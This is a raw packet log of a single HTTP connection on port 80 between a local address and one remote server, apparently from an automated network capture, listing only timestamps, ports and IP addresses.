Aug 24, 2021 08:46:53.107858896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107867002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107891083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107914925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107918024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107938051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107960939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.107983112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.107985020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.108009100 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.108010054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.108035088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.108052969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.108055115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.108076096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.108098030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.108099937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.108127117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.108135939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.108149052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.108175993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.130484104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130528927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130552053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130574942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130600929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130618095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130640030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.130642891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130666971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130692005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130707026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.130717039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130742073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130769014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130769014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.130798101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130809069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.130822897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130851030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130871058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.130887032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130909920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.130922079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130944014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130965948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.130969048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.130992889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131014109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131017923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131042957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131063938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131064892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131089926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131136894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131143093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131165981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131191015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131192923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131215096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131237984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131261110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131272078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131283045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131292105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131304979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131326914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131336927 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131350040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131371975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131373882 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131393909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131418943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131421089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131444931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131464958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131467104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131489038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131513119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131515026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.131536961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.131561995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.153671026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153697014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153713942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153729916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153744936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153760910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153776884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153795958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153814077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153829098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153846025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153848886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.153862953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153878927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153897047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153908014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153920889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153937101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153948069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.153956890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153980970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153990030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.153996944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.153997898 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154017925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154035091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154051065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154063940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154067039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154083967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154099941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154100895 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154117107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154126883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154134989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154155970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154164076 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154175043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154191017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154196978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154210091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154222012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154227018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154243946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154261112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154272079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154278994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154299974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154309034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154318094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154334068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154350996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154355049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154369116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154381037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.154412031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.154431105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.176517963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176543951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176564932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176582098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176598072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176614046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176629066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176644087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176657915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176670074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176687002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176686049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.176702976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176723003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176740885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176757097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176773071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176786900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.176791906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176808119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176824093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176831007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.176848888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176857948 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.176868916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176887035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176892996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.176902056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176918030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176920891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.176934958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176949978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176964045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.176964998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.176980972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177000046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177007914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.177016973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177032948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177050114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177066088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177069902 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.177079916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177097082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177112103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177112103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.177130938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177145958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.177149057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177165985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177172899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.177182913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177198887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177215099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177228928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.177229881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177246094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177265882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.177278996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.177304029 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199403048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199453115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199470997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199491024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199510098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199542046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199558020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199573994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199589968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199592113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199609041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199626923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199644089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199651003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199656963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199676037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199683905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199692965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199708939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199719906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199722052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199734926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199755907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199764967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199783087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199794054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199799061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199820995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199837923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199857950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199872017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199876070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199892044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199892998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.199903965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199915886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199928045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199944019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199964046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.199990988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200004101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200020075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200036049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200053930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200057030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.200061083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.200062990 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.200071096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200087070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200093985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.200103998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200119972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200129986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.200134993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200150967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200156927 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.200166941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.200212955 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.201049089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.201076984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.201095104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.201141119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.201185942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222290993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222322941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222340107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222352982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222364902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222378016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222389936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222402096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222414970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222428083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222440004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222451925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222469091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222490072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222497940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222507000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222522974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222547054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222556114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222559929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222579956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222598076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222613096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222618103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222625971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222640038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222640991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222660065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222661018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222682953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222695112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222707033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222708941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222722054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222738981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222742081 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222752094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222764969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222779036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222791910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222796917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222809076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222829103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222836018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222846985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222862959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222862959 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222879887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222892046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222897053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222913027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222919941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.222929955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222945929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222965956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.222987890 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.223159075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.223177910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.223195076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.223211050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.223216057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.223242998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245069027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245102882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245115995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245131969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245147943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245162964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245166063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.245176077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.245189905 CEST	80	49715	212.224.105.79	192.168.2.7
